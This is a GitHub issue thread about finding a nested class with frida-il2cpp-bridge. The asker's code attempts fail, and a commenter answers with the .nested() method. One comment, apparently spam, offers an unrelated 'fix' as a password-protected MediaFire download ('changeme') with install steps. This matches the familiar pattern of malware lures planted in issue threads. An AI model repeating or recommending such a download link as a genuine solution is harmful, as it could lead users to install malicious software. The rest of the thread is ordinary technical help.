### ISSUE TITLE
How to find nested class?

### ISSUE THREAD

**Issue by aiwobazou** [vfsfitvnm/frida-il2cpp-bridge#546]
question
What is the class of dunmp
// Scripts. Base
struct SGW.stGdeInfo : System.ValueType{
}
But after hooking to the object, the printed result is SGW+stGdeInfo
And use
Il2Cpp.domain.assembly("Scripts.Base").image.class("SGW.stGdeInfo");
and
Il2Cpp.domain.assembly("Scripts.Base").image.class("SGW+stGdeInfo");
It will always report an error that the class cannot be found
For example, code:

Il2Cpp.perform(() => {
for (const assembly of Il2Cpp.domain.assemblies) {
for (const klass of assembly.image.classes) {
 if(klass.name == 'stGdeInfo'){
console.log(klass);
GuideInfoClass=klass;//can be found normally
}
}
}
Var curInfo=Il2Cpp. domain. asply ("Scripts. Base"). image. class ("SGW. stGdeIfo")//Get il2cpp: could not find class SGW. stGdeIfo in assembly scripts Base.dll
Var curInfo2=Il2Cpp. domain. asply ("Scripts. Base"). image.class ("SGW+stGdeIfo")//Get il2cpp: could not find class SGW+stGdeIfo in assembly Scripts Base.dll
});

May I ask how to directly search for class in this situation

Wishing the blogger happiness and health

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by FrothierNine346** [comment]
You can try
Var curInfo=Il2Cpp.domain.assembly("Scripts. Base").image.class("SGW").nested("stGdeIfo")

**Comment by aiwobazou** [comment]
> You can try Var curInfo=Il2Cpp.domain.assembly("Scripts. Base").image.class("SGW").nested("stGdeIfo")
thanks

**Comment by aiwobazou** [comment]
Learned it 
ge t nested
